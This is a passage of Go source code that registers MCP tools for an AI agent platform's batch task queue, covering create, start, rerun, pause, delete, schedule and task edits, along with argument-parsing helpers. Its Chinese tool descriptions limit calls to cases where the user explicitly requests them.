qid := mcpArgString(args, "queue_id")
|
||||
if qid == "" {
|
||||
return batchMCPTextResult("queue_id 不能为空", true), nil
|
||||
}
|
||||
queue, ok := h.batchTaskManager.GetBatchQueue(qid)
|
||||
if !ok {
|
||||
return batchMCPTextResult("队列不存在: "+qid, true), nil
|
||||
}
|
||||
return batchMCPJSONResult(queue)
|
||||
})
|
||||
|
||||
// --- create ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskCreate,
|
||||
Description: `⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求创建批量任务、任务队列时才可调用。禁止在用户未提及”批量任务””任务队列””定时任务”等关键词时自行调用。如果用户只是让你做某件事,请在当前对话中直接完成,不要自作主张创建任务队列。
|
||||
|
||||
【用途】应用内「任务管理 / 批量任务队列」:把多条彼此独立的用户指令登记成一条队列,便于在界面里查看进度、暂停/继续、定时重跑等。这是队列数据与调度入口,不是再开一个”子代理会话”替你探索当前问题。
|
||||
|
||||
【何时用】用户明确要批量排队执行、Cron 周期跑同一批指令、或需要与任务管理页面对齐时调用。需要即时追问、强依赖当前对话上下文的分析/编码,应在本对话内直接完成,不要为了”委派”而创建队列。
|
||||
|
||||
【参数】tasks(字符串数组)或 tasks_text(多行,每行一条)二选一;每项是一条将来由系统按队列顺序执行的指令文案。agent_mode:eino_single(Eino ADK 单代理,默认)、deep / plan_execute / supervisor(需系统启用多代理)。非”把主对话拆给子代理”。schedule_mode:manual(默认)或 cron;cron 须填 cron_expr(5 段,如 “0 */6 * * *”)。
|
||||
|
||||
【执行】默认创建后为 pending,不自动跑。execute_now=true 可创建后立即跑;否则之后调用 batch_task_start。Cron 自动下一轮需 schedule_enabled 为 true(可用 batch_task_schedule_enabled)。`,
|
||||
ShortDescription: "任务管理:创建批量任务队列(登记多条指令,可选立即或 Cron)",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"title": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "可选队列标题,便于在任务管理中识别",
|
||||
},
|
||||
"role": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列使用的角色名,空表示默认",
|
||||
},
|
||||
"tasks": map[string]interface{}{
|
||||
"type": "array",
|
||||
"description": "队列中的子任务指令,每项一条独立待执行文案(与 tasks_text 二选一)",
|
||||
"items": map[string]interface{}{"type": "string"},
|
||||
},
|
||||
"tasks_text": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "多行文本,每行一条子任务指令(与 tasks 二选一)",
|
||||
},
|
||||
"agent_mode": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "执行模式:eino_single(Eino ADK,默认)、deep/plan_execute/supervisor(Eino 编排,需启用多代理)",
|
||||
"enum": []string{"eino_single", "deep", "plan_execute", "supervisor"},
|
||||
},
|
||||
"schedule_mode": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "manual(仅手工/启动后跑)或 cron(按表达式触发)",
|
||||
"enum": []string{"manual", "cron"},
|
||||
},
|
||||
"cron_expr": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "schedule_mode 为 cron 时必填。标准 5 段:分钟 小时 日 月 星期,例如 \"0 */6 * * *\"、\"30 2 * * 1-5\"",
|
||||
},
|
||||
"execute_now": map[string]interface{}{
|
||||
"type": "boolean",
|
||||
"description": "创建后是否立即开始执行队列,默认 false(pending,需 batch_task_start)",
|
||||
},
|
||||
"project_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列内子对话绑定的项目 ID(可选,未指定时使用 config.project.default_project_id)",
|
||||
},
|
||||
},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
tasks, errMsg := batchMCPTasksFromArgs(args)
|
||||
if errMsg != "" {
|
||||
return batchMCPTextResult(errMsg, true), nil
|
||||
}
|
||||
title := mcpArgString(args, "title")
|
||||
role := mcpArgString(args, "role")
|
||||
agentMode := config.NormalizeAgentMode(mcpArgString(args, "agent_mode"))
|
||||
scheduleMode := normalizeBatchQueueScheduleMode(mcpArgString(args, "schedule_mode"))
|
||||
cronExpr := strings.TrimSpace(mcpArgString(args, "cron_expr"))
|
||||
var nextRunAt *time.Time
|
||||
if scheduleMode == "cron" {
|
||||
if cronExpr == "" {
|
||||
return batchMCPTextResult("Cron 调度模式下 cron_expr 不能为空", true), nil
|
||||
}
|
||||
sch, err := h.batchCronParser.Parse(cronExpr)
|
||||
if err != nil {
|
||||
return batchMCPTextResult("无效的 Cron 表达式: "+err.Error(), true), nil
|
||||
}
|
||||
n := sch.Next(time.Now())
|
||||
nextRunAt = &n
|
||||
}
|
||||
executeNow, ok := mcpArgBool(args, "execute_now")
|
||||
if !ok {
|
||||
executeNow = false
|
||||
}
|
||||
projectID := strings.TrimSpace(mcpArgString(args, "project_id"))
|
||||
queue, createErr := h.batchTaskManager.CreateBatchQueue(title, role, agentMode, scheduleMode, cronExpr, projectID, nextRunAt, tasks)
|
||||
if createErr != nil {
|
||||
return batchMCPTextResult("创建队列失败: "+createErr.Error(), true), nil
|
||||
}
|
||||
started := false
|
||||
if executeNow {
|
||||
ok, err := h.startBatchQueueExecution(queue.ID, false)
|
||||
if !ok {
|
||||
return batchMCPTextResult("队列不存在: "+queue.ID, true), nil
|
||||
}
|
||||
if err != nil {
|
||||
return batchMCPTextResult("创建成功但启动失败: "+err.Error(), true), nil
|
||||
}
|
||||
started = true
|
||||
if refreshed, exists := h.batchTaskManager.GetBatchQueue(queue.ID); exists {
|
||||
queue = refreshed
|
||||
}
|
||||
}
|
||||
logger.Info("MCP batch_task_create", zap.String("queueId", queue.ID), zap.Int("taskCount", len(tasks)))
|
||||
return batchMCPJSONResult(map[string]interface{}{
|
||||
"queue_id": queue.ID,
|
||||
"queue": queue,
|
||||
"started": started,
|
||||
"execute_now": executeNow,
|
||||
"reminder": func() string {
|
||||
if started {
|
||||
return "队列已创建并立即启动。"
|
||||
}
|
||||
return "队列已创建,当前为 pending。需要开始执行时请调用 MCP 工具 batch_task_start(queue_id 同上)。Cron 自动调度需 schedule_enabled 为 true,可用 batch_task_schedule_enabled。"
|
||||
}(),
|
||||
})
|
||||
})
|
||||
|
||||
// --- start ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskStart,
|
||||
Description: `启动或继续执行批量任务队列(pending / paused)。
|
||||
与 batch_task_create 配合使用:仅创建队列不会自动执行,需调用本工具才会开始跑子任务。
|
||||
|
||||
⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求启动/继续批量任务时才可调用。不要在用户未要求时自行调用。`,
|
||||
ShortDescription: "启动/继续批量任务队列(创建后需调用才会执行)",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
if qid == "" {
|
||||
return batchMCPTextResult("queue_id 不能为空", true), nil
|
||||
}
|
||||
ok, err := h.startBatchQueueExecution(qid, false)
|
||||
if !ok {
|
||||
return batchMCPTextResult("队列不存在: "+qid, true), nil
|
||||
}
|
||||
if err != nil {
|
||||
return batchMCPTextResult("启动失败: "+err.Error(), true), nil
|
||||
}
|
||||
logger.Info("MCP batch_task_start", zap.String("queueId", qid))
|
||||
return batchMCPTextResult("已提交启动,队列将开始执行。", false), nil
|
||||
})
|
||||
|
||||
// --- rerun (reset + start for completed/cancelled queues) ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskRerun,
|
||||
Description: "重跑已完成或已取消的批量任务队列。会重置所有子任务状态后重新执行一轮。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求重跑批量任务时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "重跑批量任务队列",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
if qid == "" {
|
||||
return batchMCPTextResult("queue_id 不能为空", true), nil
|
||||
}
|
||||
queue, exists := h.batchTaskManager.GetBatchQueue(qid)
|
||||
if !exists {
|
||||
return batchMCPTextResult("队列不存在: "+qid, true), nil
|
||||
}
|
||||
if queue.Status != "completed" && queue.Status != "cancelled" {
|
||||
return batchMCPTextResult("仅已完成或已取消的队列可以重跑,当前状态: "+queue.Status, true), nil
|
||||
}
|
||||
if !h.batchTaskManager.ResetQueueForRerun(qid) {
|
||||
return batchMCPTextResult("重置队列失败", true), nil
|
||||
}
|
||||
ok, err := h.startBatchQueueExecution(qid, false)
|
||||
if !ok {
|
||||
return batchMCPTextResult("启动失败", true), nil
|
||||
}
|
||||
if err != nil {
|
||||
return batchMCPTextResult("启动失败: "+err.Error(), true), nil
|
||||
}
|
||||
logger.Info("MCP batch_task_rerun", zap.String("queueId", qid))
|
||||
return batchMCPTextResult("已重置并重新启动队列。", false), nil
|
||||
})
|
||||
|
||||
// --- pause ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskPause,
|
||||
Description: "暂停正在运行的批量任务队列(当前子任务会被取消)。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求暂停批量任务时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "暂停批量任务队列",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
if qid == "" {
|
||||
return batchMCPTextResult("queue_id 不能为空", true), nil
|
||||
}
|
||||
if !h.batchTaskManager.PauseQueue(qid) {
|
||||
return batchMCPTextResult("无法暂停:队列不存在或当前非 running 状态", true), nil
|
||||
}
|
||||
logger.Info("MCP batch_task_pause", zap.String("queueId", qid))
|
||||
return batchMCPTextResult("队列已暂停。", false), nil
|
||||
})
|
||||
|
||||
// --- delete queue ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskDelete,
|
||||
Description: "删除批量任务队列及其子任务记录。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求删除批量任务队列时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "删除批量任务队列",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
if qid == "" {
|
||||
return batchMCPTextResult("queue_id 不能为空", true), nil
|
||||
}
|
||||
if !h.batchTaskManager.DeleteQueue(qid) {
|
||||
return batchMCPTextResult("删除失败:队列不存在", true), nil
|
||||
}
|
||||
logger.Info("MCP batch_task_delete", zap.String("queueId", qid))
|
||||
return batchMCPTextResult("队列已删除。", false), nil
|
||||
})
|
||||
|
||||
// --- update metadata (title/role/agentMode) ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskUpdateMetadata,
|
||||
Description: "修改批量任务队列的标题、角色和代理模式。仅在队列非 running 状态下可修改。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求修改批量任务队列属性时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "修改批量任务队列标题/角色/代理模式",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
"title": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "新标题(空字符串清除标题)",
|
||||
},
|
||||
"role": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "新角色名(空字符串使用默认角色)",
|
||||
},
|
||||
"agent_mode": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "代理模式:eino_single、deep、plan_execute、supervisor",
|
||||
"enum": []string{"eino_single", "deep", "plan_execute", "supervisor"},
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
if qid == "" {
|
||||
return batchMCPTextResult("queue_id 不能为空", true), nil
|
||||
}
|
||||
title := mcpArgString(args, "title")
|
||||
role := mcpArgString(args, "role")
|
||||
agentMode := mcpArgString(args, "agent_mode")
|
||||
if err := h.batchTaskManager.UpdateQueueMetadata(qid, title, role, agentMode); err != nil {
|
||||
return batchMCPTextResult(err.Error(), true), nil
|
||||
}
|
||||
updated, _ := h.batchTaskManager.GetBatchQueue(qid)
|
||||
logger.Info("MCP batch_task_update_metadata", zap.String("queueId", qid))
|
||||
return batchMCPJSONResult(updated)
|
||||
})
|
||||
|
||||
// --- update schedule ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskUpdateSchedule,
|
||||
Description: `修改批量任务队列的调度方式和 Cron 表达式。仅在队列非 running 状态下可修改。
|
||||
schedule_mode 为 cron 时必须提供有效 cron_expr;为 manual 时会清除 Cron 配置。
|
||||
|
||||
⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求修改批量任务调度配置时才可调用。不要在用户未要求时自行调用。`,
|
||||
ShortDescription: "修改批量任务调度配置(Cron 表达式)",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
"schedule_mode": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "manual 或 cron",
|
||||
"enum": []string{"manual", "cron"},
|
||||
},
|
||||
"cron_expr": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "Cron 表达式(schedule_mode 为 cron 时必填)。标准 5 段格式:分钟 小时 日 月 星期,如 \"0 */6 * * *\"(每6小时)、\"30 2 * * 1-5\"(工作日凌晨2:30)",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id", "schedule_mode"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
if qid == "" {
|
||||
return batchMCPTextResult("queue_id 不能为空", true), nil
|
||||
}
|
||||
queue, exists := h.batchTaskManager.GetBatchQueue(qid)
|
||||
if !exists {
|
||||
return batchMCPTextResult("队列不存在: "+qid, true), nil
|
||||
}
|
||||
if queue.Status == "running" {
|
||||
return batchMCPTextResult("队列正在运行中,无法修改调度配置", true), nil
|
||||
}
|
||||
scheduleMode := normalizeBatchQueueScheduleMode(mcpArgString(args, "schedule_mode"))
|
||||
cronExpr := strings.TrimSpace(mcpArgString(args, "cron_expr"))
|
||||
var nextRunAt *time.Time
|
||||
if scheduleMode == "cron" {
|
||||
if cronExpr == "" {
|
||||
return batchMCPTextResult("Cron 调度模式下 cron_expr 不能为空", true), nil
|
||||
}
|
||||
sch, err := h.batchCronParser.Parse(cronExpr)
|
||||
if err != nil {
|
||||
return batchMCPTextResult("无效的 Cron 表达式: "+err.Error(), true), nil
|
||||
}
|
||||
n := sch.Next(time.Now())
|
||||
nextRunAt = &n
|
||||
}
|
||||
h.batchTaskManager.UpdateQueueSchedule(qid, scheduleMode, cronExpr, nextRunAt)
|
||||
updated, _ := h.batchTaskManager.GetBatchQueue(qid)
|
||||
logger.Info("MCP batch_task_update_schedule", zap.String("queueId", qid), zap.String("scheduleMode", scheduleMode), zap.String("cronExpr", cronExpr))
|
||||
return batchMCPJSONResult(updated)
|
||||
})
|
||||
|
||||
// --- schedule enabled ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskScheduleEnabled,
|
||||
Description: `设置是否允许 Cron 自动触发该队列。关闭后仍保留 Cron 表达式,仅停止定时自动跑;可用手工「启动」执行。
|
||||
仅对 schedule_mode 为 cron 的队列有意义。
|
||||
|
||||
⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求开关批量任务自动调度时才可调用。不要在用户未要求时自行调用。`,
|
||||
ShortDescription: "开关批量任务 Cron 自动调度",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
"schedule_enabled": map[string]interface{}{
|
||||
"type": "boolean",
|
||||
"description": "true 允许定时触发,false 仅手工执行",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id", "schedule_enabled"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
if qid == "" {
|
||||
return batchMCPTextResult("queue_id 不能为空", true), nil
|
||||
}
|
||||
en, ok := mcpArgBool(args, "schedule_enabled")
|
||||
if !ok {
|
||||
return batchMCPTextResult("schedule_enabled 必须为布尔值", true), nil
|
||||
}
|
||||
if _, exists := h.batchTaskManager.GetBatchQueue(qid); !exists {
|
||||
return batchMCPTextResult("队列不存在", true), nil
|
||||
}
|
||||
if !h.batchTaskManager.SetScheduleEnabled(qid, en) {
|
||||
return batchMCPTextResult("更新失败", true), nil
|
||||
}
|
||||
queue, _ := h.batchTaskManager.GetBatchQueue(qid)
|
||||
logger.Info("MCP batch_task_schedule_enabled", zap.String("queueId", qid), zap.Bool("enabled", en))
|
||||
return batchMCPJSONResult(queue)
|
||||
})
|
||||
|
||||
// --- add task ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskAdd,
|
||||
Description: "向处于 pending 状态的队列追加一条子任务。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求向批量任务队列添加子任务时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "批量队列添加子任务",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
"message": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "任务指令内容",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id", "message"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
msg := strings.TrimSpace(mcpArgString(args, "message"))
|
||||
if qid == "" || msg == "" {
|
||||
return batchMCPTextResult("queue_id 与 message 均不能为空", true), nil
|
||||
}
|
||||
task, err := h.batchTaskManager.AddTaskToQueue(qid, msg)
|
||||
if err != nil {
|
||||
return batchMCPTextResult(err.Error(), true), nil
|
||||
}
|
||||
queue, _ := h.batchTaskManager.GetBatchQueue(qid)
|
||||
logger.Info("MCP batch_task_add_task", zap.String("queueId", qid), zap.String("taskId", task.ID))
|
||||
return batchMCPJSONResult(map[string]interface{}{"task": task, "queue": queue})
|
||||
})
|
||||
|
||||
// --- update task ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskUpdate,
|
||||
Description: "修改 pending 队列中仍为 pending 的子任务文案。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求修改批量子任务内容时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "更新批量子任务内容",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
"task_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "子任务 ID",
|
||||
},
|
||||
"message": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "新的任务指令",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id", "task_id", "message"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
tid := mcpArgString(args, "task_id")
|
||||
msg := strings.TrimSpace(mcpArgString(args, "message"))
|
||||
if qid == "" || tid == "" || msg == "" {
|
||||
return batchMCPTextResult("queue_id、task_id、message 均不能为空", true), nil
|
||||
}
|
||||
if err := h.batchTaskManager.UpdateTaskMessage(qid, tid, msg); err != nil {
|
||||
return batchMCPTextResult(err.Error(), true), nil
|
||||
}
|
||||
queue, _ := h.batchTaskManager.GetBatchQueue(qid)
|
||||
logger.Info("MCP batch_task_update_task", zap.String("queueId", qid), zap.String("taskId", tid))
|
||||
return batchMCPJSONResult(queue)
|
||||
})
|
||||
|
||||
// --- remove task ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskRemove,
|
||||
Description: "从 pending 队列中删除仍为 pending 的子任务。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求删除批量子任务时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "删除批量子任务",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
"task_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "子任务 ID",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id", "task_id"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
qid := mcpArgString(args, "queue_id")
|
||||
tid := mcpArgString(args, "task_id")
|
||||
if qid == "" || tid == "" {
|
||||
return batchMCPTextResult("queue_id 与 task_id 均不能为空", true), nil
|
||||
}
|
||||
if err := h.batchTaskManager.DeleteTask(qid, tid); err != nil {
|
||||
return batchMCPTextResult(err.Error(), true), nil
|
||||
}
|
||||
queue, _ := h.batchTaskManager.GetBatchQueue(qid)
|
||||
logger.Info("MCP batch_task_remove_task", zap.String("queueId", qid), zap.String("taskId", tid))
|
||||
return batchMCPJSONResult(queue)
|
||||
})
|
||||
|
||||
logger.Info("批量任务 MCP 工具已注册", zap.Int("count", 12))
|
||||
}
|
||||
|
||||
// --- batch_task_list 精简结构(避免把每条子任务的 result 等大段文本塞进列表上下文) ---
|
||||
|
||||
const mcpBatchListTaskMessageMaxRunes = 160
|
||||
|
||||
// batchTaskMCPListSummary 列表中的子任务摘要(完整字段用 batch_task_get)
|
||||
type batchTaskMCPListSummary struct {
|
||||
ID string `json:"id"`
|
||||
Status string `json:"status"`
|
||||
Message string `json:"message,omitempty"`
|
||||
}
|
||||
|
||||
// batchTaskQueueMCPListItem 列表中的队列摘要
|
||||
type batchTaskQueueMCPListItem struct {
|
||||
ID string `json:"id"`
|
||||
Title string `json:"title,omitempty"`
|
||||
Role string `json:"role,omitempty"`
|
||||
AgentMode string `json:"agentMode"`
|
||||
ScheduleMode string `json:"scheduleMode"`
|
||||
CronExpr string `json:"cronExpr,omitempty"`
|
||||
NextRunAt *time.Time `json:"nextRunAt,omitempty"`
|
||||
ScheduleEnabled bool `json:"scheduleEnabled"`
|
||||
LastScheduleTriggerAt *time.Time `json:"lastScheduleTriggerAt,omitempty"`
|
||||
Status string `json:"status"`
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
StartedAt *time.Time `json:"startedAt,omitempty"`
|
||||
CompletedAt *time.Time `json:"completedAt,omitempty"`
|
||||
CurrentIndex int `json:"currentIndex"`
|
||||
TaskTotal int `json:"task_total"`
|
||||
TaskCounts map[string]int `json:"task_counts"`
|
||||
Tasks []batchTaskMCPListSummary `json:"tasks"`
|
||||
}
|
||||
|
||||
func truncateStringRunes(s string, maxRunes int) string {
|
||||
if maxRunes <= 0 {
|
||||
return ""
|
||||
}
|
||||
n := 0
|
||||
for i := range s {
|
||||
if n == maxRunes {
|
||||
out := strings.TrimSpace(s[:i])
|
||||
if out == "" {
|
||||
return "…"
|
||||
}
|
||||
return out + "…"
|
||||
}
|
||||
n++
|
||||
}
|
||||
return s
|
||||
}
|
||||
|
||||
const mcpBatchListMaxTasksPerQueue = 200 // 列表中每个队列最多返回的子任务摘要数
|
||||
|
||||
func toBatchTaskQueueMCPListItem(q *BatchTaskQueue) batchTaskQueueMCPListItem {
|
||||
counts := map[string]int{
|
||||
"pending": 0,
|
||||
"running": 0,
|
||||
"completed": 0,
|
||||
"failed": 0,
|
||||
"cancelled": 0,
|
||||
}
|
||||
tasks := make([]batchTaskMCPListSummary, 0, len(q.Tasks))
|
||||
for _, t := range q.Tasks {
|
||||
if t == nil {
|
||||
continue
|
||||
}
|
||||
counts[t.Status]++
|
||||
// 列表视图限制子任务摘要数量,完整列表通过 batch_task_get 查看
|
||||
if len(tasks) < mcpBatchListMaxTasksPerQueue {
|
||||
tasks = append(tasks, batchTaskMCPListSummary{
|
||||
ID: t.ID,
|
||||
Status: t.Status,
|
||||
Message: truncateStringRunes(t.Message, mcpBatchListTaskMessageMaxRunes),
|
||||
})
|
||||
}
|
||||
}
|
||||
return batchTaskQueueMCPListItem{
|
||||
ID: q.ID,
|
||||
Title: q.Title,
|
||||
Role: q.Role,
|
||||
AgentMode: q.AgentMode,
|
||||
ScheduleMode: q.ScheduleMode,
|
||||
CronExpr: q.CronExpr,
|
||||
NextRunAt: q.NextRunAt,
|
||||
ScheduleEnabled: q.ScheduleEnabled,
|
||||
LastScheduleTriggerAt: q.LastScheduleTriggerAt,
|
||||
Status: q.Status,
|
||||
CreatedAt: q.CreatedAt,
|
||||
StartedAt: q.StartedAt,
|
||||
CompletedAt: q.CompletedAt,
|
||||
CurrentIndex: q.CurrentIndex,
|
||||
TaskTotal: len(tasks),
|
||||
TaskCounts: counts,
|
||||
Tasks: tasks,
|
||||
}
|
||||
}
|
||||
|
||||
func batchMCPTextResult(text string, isErr bool) *mcp.ToolResult {
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{{Type: "text", Text: text}},
|
||||
IsError: isErr,
|
||||
}
|
||||
}
|
||||
|
||||
func batchMCPJSONResult(v interface{}) (*mcp.ToolResult, error) {
|
||||
b, err := json.MarshalIndent(v, "", " ")
|
||||
if err != nil {
|
||||
return batchMCPTextResult(fmt.Sprintf("JSON 编码失败: %v", err), true), nil
|
||||
}
|
||||
return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: string(b)}}}, nil
|
||||
}
|
||||
|
||||
func batchMCPTasksFromArgs(args map[string]interface{}) ([]string, string) {
|
||||
if raw, ok := args["tasks"]; ok && raw != nil {
|
||||
switch t := raw.(type) {
|
||||
case []interface{}:
|
||||
out := make([]string, 0, len(t))
|
||||
for _, x := range t {
|
||||
if s, ok := x.(string); ok {
|
||||
if tr := strings.TrimSpace(s); tr != "" {
|
||||
out = append(out, tr)
|
||||
}
|
||||
}
|
||||
}
|
||||
if len(out) > 0 {
|
||||
return out, ""
|
||||
}
|
||||
}
|
||||
}
|
||||
if txt := mcpArgString(args, "tasks_text"); txt != "" {
|
||||
lines := strings.Split(txt, "\n")
|
||||
out := make([]string, 0, len(lines))
|
||||
for _, line := range lines {
|
||||
if tr := strings.TrimSpace(line); tr != "" {
|
||||
out = append(out, tr)
|
||||
}
|
||||
}
|
||||
if len(out) > 0 {
|
||||
return out, ""
|
||||
}
|
||||
}
|
||||
return nil, "需要提供 tasks(字符串数组)或 tasks_text(多行文本,每行一条任务)"
|
||||
}
|
||||
|
||||
func mcpArgString(args map[string]interface{}, key string) string {
|
||||
v, ok := args[key]
|
||||
if !ok || v == nil {
|
||||
return ""
|
||||
}
|
||||
switch t := v.(type) {
|
||||
case string:
|
||||
return strings.TrimSpace(t)
|
||||
case float64:
|
||||
return strings.TrimSpace(strconv.FormatFloat(t, 'f', -1, 64))
|
||||
case json.Number:
|
||||
return strings.TrimSpace(t.String())
|
||||
default:
|
||||
return strings.TrimSpace(fmt.Sprint(t))
|
||||
}
|
||||
}
|
||||
|
||||
func mcpArgFloat(args map[string]interface{}, key string) float64 {
|
||||
v, ok := args[key]
|
||||
if !ok || v == nil {
|
||||
return 0
|
||||
}
|
||||
switch t := v.(type) {
|
||||
case float64:
|
||||
return t
|
||||
case int:
|
||||
return float64(t)
|
||||
case int64:
|
||||
return float64(t)
|
||||
case json.Number:
|
||||
f, _ := t.Float64()
|
||||
return f
|
||||
case string:
|
||||
f, _ := strconv.ParseFloat(strings.TrimSpace(t), 64)
|
||||
return f
|
||||
default:
|
||||
return 0
|
||||
}
|
||||
}
|
||||
|
||||
func mcpArgBool(args map[string]interface{}, key string) (val bool, ok bool) {
|
||||
v, exists := args[key]
|
||||
if !exists {
|
||||
return false, false
|
||||
}
|
||||
switch t := v.(type) {
|
||||
case bool:
|
||||
return t, true
|
||||
case string:
|
||||
s := strings.ToLower(strings.TrimSpace(t))
|
||||
